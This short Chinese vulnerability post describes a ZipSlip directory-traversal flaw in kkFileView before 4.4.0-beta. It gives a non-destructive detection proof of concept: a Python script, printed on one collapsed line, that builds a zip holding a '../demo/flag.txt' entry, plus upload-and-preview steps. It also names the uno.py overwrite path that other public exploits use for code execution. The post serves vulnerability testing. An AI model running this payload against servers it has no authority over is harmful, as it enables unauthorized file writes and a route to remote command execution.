KKfileview<4.4.0-beta 目录穿越漏洞无损测试Poc
漏洞推送 2026-06-04 23:56 浙江

在kkFileView 4.4.0-beta以前,存在一处ZipSlip漏洞。攻击者可以利用该漏洞,向服务器任意目录下写入文件,导致任意命令执行漏洞。
具体poc可以参考:
https://github.com/vulhub/vulhub/blob/master/kkfileview/4.3-zipslip-rce/README.zh-cn.md
但是现在网络上的poc都有一个问题,就是直接修改了../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py,破坏性检测。
而且如果在服务器不除网或者,uno.py位置不正确的情况下,是无法执行命令的,也无法检测是否存在漏洞。
但是kkfileview本身会把demo文件夹下的文件全部列出来,所以我们可以用
import zipfileif __name__ == "__main__":try:binary1 = b'vulhub'binary2 = b"falg\n"zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)# info = zipfile.ZipInfo("test.zip")zipFile.writestr("test", binary1)zipFile.writestr("../demo/flag.txt", binary2)zipFile.close()except IOError as e:raise e
然后参考正常poc的流程,上传zip、预览以后,查看文件列表中是否出现了flag.txt文件即可